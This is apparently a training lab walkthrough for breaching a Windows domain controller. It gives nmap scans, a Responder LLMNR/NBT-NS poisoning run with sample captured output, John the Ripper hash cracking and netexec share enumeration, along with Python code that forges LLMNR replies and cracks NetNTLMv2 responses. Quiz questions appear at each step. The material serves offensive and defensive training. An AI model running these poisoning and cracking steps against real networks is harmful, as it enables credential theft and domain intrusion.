
Active Directory Attack Lab

easy 16 tasks 1 hour
A Practical Guide to Exploiting a Windows Domain Controller
This hands-on lab walks you through the full lifecycle of an Active Directory breach: from initial network reconnaissance and LLMNR poisoning, to password cracking, enumeration of domain trusts, privilege escalation via group membership abuse, and ultimately gaining Domain Admin access.

Introduction

1 Points

Why Attack a Domain Controller?

Domain Controllers (DCs) are the crown jewels of an organization: in a typical environment they manage user accounts, authentication, group policy and more. Compromising a DC gives an attacker the keys to the kingdom, full control of the entire infrastructure. In this lab we will work through a red team operation focused on a Windows Domain Controller. Specifically, you will:

  • Conduct host and service discovery
  • Poison LLMNR/NBT-NS name resolution
  • Crack the hashes you captured
  • Enumerate Active Directory with the credentials you recovered
  • Follow a standard privilege escalation path from the compromised account to Domain Admin access

Whether you are learning offensive tactics or you are a system administrator looking to harden and defend your infrastructure, this walkthrough covers the full kill chain for this scenario, step by step.

Optional: You can connect to this lab using a VPN to run all your tools from your own Kali machine. 

Machine Type: Windows

Machine Difficulty: Medium

Target IP Address: [To be discovered on boot]

LAN Subnet: 192.168.45.0/24


Let's get started hunting

Click Complete once you finish the task.

Find Target IP

5 Points

Before we can do anything, we first need to find the exact IP address of the target computer on our local network.

Goal: Find the correct IP address of the target computer

Tool: arp-scan

Simple scanner that helps find active computers on your immediate network. 

Open your terminal and type following command:

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
  • sudo: arp-scan sends raw ARP frames, so it has to run as root
  • arp-scan: the ARP scanner itself
  • -l (--localnet): scan the whole local subnet of your interface, as derived from its IP address and netmask

arp-scan lists the IP address, MAC address and MAC vendor of every device that answers on your local network. Because ARP requests are never routed, only hosts on the same layer-2 segment show up; if you connected through the VPN, ARP does not cross the tunnel, so use a ping or TCP sweep of the LAN subnet instead.

 

Question: What is the IP address of the Target machine?

Full Match Answer:

Information Gathering 1

5 Points

Our first task is to figure out what's running on this machine. Think of it like walking around a building and seeing which lights are on, and what kind of doors are open.

Goal: Find all open TCP ports and identify the services running on them

Tool: nmap

A tool used for network discovery and security auditing. It can do everything from simply checking whether a host is up to identifying services and even known vulnerabilities.

Open your terminal and type:

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC -Pn -T4 [Target-IP] -p-
  • -sV: Enable service/version detection
  • -sC: Run the default NSE script set
  • -Pn: Skip host discovery (assume the host is up)
  • -T4: Use the aggressive timing template to speed up the scan
  • -p-: Scan all 65535 TCP ports

Note: In a real penetration test you can start without -p- (nmap then scans its 1000 most common ports) to save time; if nothing interesting turns up, rerun the scan with -p- .

The target runs Kerberos (88/tcp), LDAP (389/tcp) and SMB (445/tcp), and the default SMB scripts report its NetBIOS and domain names. From this we can tell that the target is a Windows Domain Controller.

Question: What is the NetBIOS name of the scanned host?

Full Match Answer:

Information Gathering 2

5 Points

While TCP scans are essential, many services, especially in a Windows environment, also communicate over UDP (User Datagram Protocol).

Goal: Identify open UDP ports and their services

In your terminal type:

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -sU -F -Pn [Target-IP]
  • -T4: Set the speed of the scan
  • -sU: Tell nmap to scan UDP ports (slow, because closed ports often do not answer at all)
  • -F: Fast scan, only the 100 most common ports
  • -Pn: Skip host discovery, assume the target is up

 

Question: What is the service running on UDP port 123?

Full Match Answer:

Exploitation: Leveraging Weaknesses

10 Points

Now that we have a good understanding of our target's services, it's time to look for ways to exploit them. One common vulnerability in Windows networks involves protocols like LLMNR and NBT-NS.

Understanding LLMNR/NBT-NS Poisoning

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name resolution protocols that Windows (and some other operating systems) use when DNS cannot resolve a name.

The Vulnerability: If a client tries to resolve a hostname (e.g., a mistyped file share) and DNS returns no answer, it falls back to asking the local segment: an LLMNR query is multicast to 224.0.0.252 on UDP 5355, an NBT-NS query is broadcast on UDP 137. Neither protocol authenticates the answer, so any host on the segment can reply "that name is me". The client then connects to the attacker's IP and, for SMB, authenticates with NTLM, handing over a NetNTLMv2 challenge-response that can be cracked offline.

Since we are on the same LAN as the domain controller and its clients, we can perform an LLMNR/NBT-NS poisoning attack with Responder.
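To make the "no authentication" point concrete, here is the LLMNR exchange on the wire. This is an added example written for this page, not Responder's code or the lab's own material: it builds the victim's query, the poisoned reply and the only checks a resolver performs before trusting an answer. The packets are constructed in memory and never sent; the name FileServer and the address 192.168.45.10 are made-up values.

```python
"""Added example (not part of the lab): the LLMNR exchange Responder abuses, on the wire.

LLMNR (RFC 4795) reuses the DNS message format. A client that cannot resolve a name via
DNS multicasts a query to 224.0.0.252:5355; any host on the segment may answer, and the
client accepts the first reply whose transaction ID and question match. The packets here
are constructed in memory and never sent; the name and addresses are made up.
"""
import random
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # IPv4 multicast address and UDP port for LLMNR
FLAG_QR = 0x8000                                 # bit 15 of the flags word: 1 = response


def encode_name(name):
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.strip(".").split(".")) + b"\x00"


def decode_name(buf, off):
    """Decode a (possibly compressed) name at offset off; return (name, offset after it)."""
    labels = []
    while True:
        length = buf[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:  # compression pointer, used by the answer below
            pointer = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            return decode_name(buf, pointer)[0], off + 2
        labels.append(buf[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def build_llmnr_query(name, txid=None):
    """What the victim sends: flags 0 (standard query), one question, type A, class IN."""
    txid = random.randrange(0x10000) if txid is None else txid
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_llmnr(pkt):
    """Parse header, question section and answer section of an LLMNR message."""
    txid, flags, qdcount, ancount, _ns, _ar = struct.unpack_from("!HHHHHH", pkt, 0)
    off, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, off = decode_name(pkt, off)
        qtype, qclass = struct.unpack_from("!HH", pkt, off)
        off += 4
        questions.append((name, qtype, qclass))
    for _ in range(ancount):
        name, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        answers.append((name, rtype, ttl, socket.inet_ntoa(rdata) if rtype == 1 and rdlen == 4 else rdata))
    return {"id": txid, "qr": flags >> 15, "questions": questions, "answers": answers}


def build_poisoned_answer(query_pkt, attacker_ip, ttl=30):
    """What the poisoner sends (unicast back to the querier): same ID, same question,
    and an A record pointing the requested name at the attacker's own address."""
    query = parse_llmnr(query_pkt)
    name, qtype, qclass = query["questions"][0]
    if qtype != 1:
        raise ValueError("only A queries are answered in this example")
    header = struct.pack("!HHHHHH", query["id"], FLAG_QR, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    # 0xC00C = pointer to offset 12, i.e. the name in the question section
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def victim_accepts(query_pkt, response_pkt):
    """All an LLMNR resolver checks before trusting an answer: QR set, matching ID and
    matching question. Nothing proves who sent it, which is the whole weakness."""
    q, r = parse_llmnr(query_pkt), parse_llmnr(response_pkt)
    return r["qr"] == 1 and r["id"] == q["id"] and r["questions"] == q["questions"]


if __name__ == "__main__":
    query = build_llmnr_query("FileServer")                 # victim asks for a name DNS could not resolve
    reply = build_poisoned_answer(query, "192.168.45.10")   # attacker claims to be that host
    print(parse_llmnr(reply)["answers"], "accepted:", victim_accepts(query, reply))
```

The defensive takeaway is the same as the offensive one: because the resolver only matches ID and question, the fix is not to validate answers but to stop asking the segment at all (disable LLMNR via Group Policy and NetBIOS over TCP/IP on the adapters), which is why this is the first hardening item on most AD assessment reports.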

Goal: Capture hashed credentials from clients on the network

Tool: Responder

A tool designed for LLMNR, NBT-NS and mDNS poisoning that also runs rogue servers (SMB, HTTP, LDAP and others) to capture the credentials clients then authenticate with.

Open your terminal and type:

┌──(kali㉿kali)-[~]
└─$ sudo responder -I 'eth0' -v
  • -I 'eth0': Specifies the network interface Responder should listen on (the one attached to the lab LAN)
  • -v: Enables verbose output

Now, Responder will start listening on the specified interface. It will passively wait for LLMNR/NBT-NS queries. If a client on the network sends out a query for a name that DNS can't resolve, Responder will spoof a response, claiming to be that host.

Wait a few minutes until Responder captures and displays a hash. Poisoning is passive by nature: nothing appears until a client on the network asks for a name that DNS cannot resolve.

[*] [DNS] A Record poisoned answer sent to: 192.168.10.4     Requested name: .FileServer.SOUPEDECODE.LOCAL
[SMB] NTLMv2-SSP Client   : 192.168.10.4
[SMB] NTLMv2-SSP Username : soupedecode\xk******
[SMB] NTLMv2-SSP Hash     : xk****::so****:06952bd9b466cbc9:67E056B0CCAB650FC159EC3A97BC49E6:0101000000000000004.... 

Ignore any error like:

[!] Error starting TCP server on port 3389, check permissions or other servers running.

 

Question: What is the username of the user whose NTLMv2 hash was captured during the Responder attack?

Full Match Answer:

Cracking the Hash With John The Ripper

10 Points

Now that we have a hash, the next step is to try to crack it. A NetNTLMv2 "hash" is not a stored password hash but a challenge-response (an HMAC over the server's challenge), so it cannot be passed like an NT hash; it can only be cracked offline by a dictionary or brute-force attack, computing the expected response for candidate passwords until one matches the captured value.

Goal: Crack the NTLMv2 hash we captured to reveal the user's plain-text password.

Tool: John the Ripper

Open-source password cracking tool. It supports a wide variety of hash types and attack modes.

Note: Before running John, you need to save the captured hash value into a file. Let's assume you save the hash into a file named hash.txt. Responder also writes every captured hash to its logs directory (on Kali, /usr/share/responder/logs/), in a file named after the protocol and client IP such as SMB-NTLMv2-SSP-<client-ip>.txt, already in the format John expects.

xk****::so****:06952bd9b466cbc9:67E056B0CCAB650FC159EC3A97BC49E6:0101000000000000004.... 

Now, in your terminal type:

┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/john.lst --format=netntlmv2 hash.txt
  • --wordlist=: Specifies the wordlist to use (John takes the file name joined to the option with = or :)
  • --format=netntlmv2: tells John the Ripper that the hash in hash.txt is in the netntlmv2 format

Note: John can automatically detect some hash formats, but explicitly specifying it can help, especially with complex hashes.
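To show what --format=netntlmv2 actually computes for each wordlist entry (and why the user::domain:challenge:NTProofStr:blob line has exactly those fields), here is a small dictionary cracker written as an added example for this page; it is not John's code and not the lab's material. It implements the MS-NLMP derivation (MD4-based NT hash, HMAC-MD5 keyed NTOWFv2, HMAC-MD5 NTProofStr) in pure Python so it runs without the legacy MD4 provider. The user jdoe, domain CORP, server challenge, client blob, password and wordlist are all constructed for illustration and are not the values captured in the lab.

```python
"""Added example (not part of the lab): what John's --format=netntlmv2 mode actually does.

A NetNTLMv2 "hash" is a challenge-response, not a stored password hash. Cracking means
recomputing the response for each candidate password and comparing it with the captured
NTProofStr. Everything below is constructed for illustration: user, domain, server
challenge, blob and wordlist are made up and are not the lab's real values.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (function, message word order per step, shift amounts, additive constant)
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, order, shifts, k in rounds:
            for i, word in enumerate(order):
                t = (a + fn(b, c, d) + x[word] + k) & MASK
                a, b, c, d = d, rotl(t, shifts[i % 4]), b, c   # rotate registers each step
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """NT hash = MD4 of the UTF-16LE password (what John/hashcat call NTLM)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password, user, domain):
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge, blob):
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge || client blob."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def john_line(user, domain, server_challenge, proof, blob):
    """The user::domain:challenge:NTProofStr:blob line Responder prints and John reads."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex().upper()}:{blob.hex()}"


def crack(line, wordlist):
    """Dictionary attack: recompute NTProofStr per candidate and compare with the captured one."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def build_blob(domain, timestamp, client_challenge):
    """Minimal NTLMv2_CLIENT_CHALLENGE ("blob"): version, timestamp, client nonce, AV pairs."""
    av_pairs = struct.pack("<HH", 2, len(domain) * 2) + domain.encode("utf-16le") + struct.pack("<HH", 0, 0)
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)


# Constructed capture (NOT the lab's real values): a client authenticated to our fake SMB
# server with password "Winter2024!" and we recorded the challenge and response.
SAMPLE_USER, SAMPLE_DOMAIN = "jdoe", "CORP"
SAMPLE_SERVER_CHALLENGE = bytes.fromhex("1122334455667788")   # 8-byte challenge our rogue server sent
SAMPLE_BLOB = build_blob(SAMPLE_DOMAIN, 0x01D9E6F00B2C1A00, bytes.fromhex("a1b2c3d4e5f60718"))
SAMPLE_LINE = john_line(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_SERVER_CHALLENGE,
                        nt_proof("Winter2024!", SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_SERVER_CHALLENGE, SAMPLE_BLOB),
                        SAMPLE_BLOB)
WORDLIST = ["password", "Summer2023", "Password1", "Winter2024!", "letmein"]   # stand-in for john.lst

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

Two things worth noticing: the username is upper-cased before it is mixed into the key but the domain is not, so a line whose domain field Responder printed in a different case than the client sent will never crack; and because the server challenge is part of the HMAC input, a captured response is only valid for that one exchange, which is why it can be cracked or relayed but not replayed later.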

We now have the plain-text password for user xk******.

Question: What is the clear text password for user xk******?

Full Match Answer:

Post-Exploitation: Leveraging our Credentials

5 Points

With a username and password, we can now attempt to authenticate to the target system and gather more information.

Goal: List the SMB shared folders using the new login details.

Tool: netexec

A tool for pentesting large networks. It automates credential testing, enumeration and exploitation across SMB, LDAP, WinRM and other protocols.

Open your terminal and type:

┌──(kali㉿kali)-[~]
└─$ netexec smb [Target-IP] -u [User Name] -p [Password] --shares
  • smb: Specifies that we are targeting the SMB protocol
  • -u: Specifies the username
  • -p: Specifies the password we cracked
  • --shares: tells NetExec to enumerate SMB shares that the provided user has access to

This lists every share the account can see, together with its permissions (READ, WRITE) and remark. The default shares on a DC are ADMIN$, C$, IPC$, NETLOGON and SYSVOL; anything beyond those is custom and worth a closer look.

Question: There is an interesting custom share with READ,WRITE permissions. What is the share name?

Full Match Answer: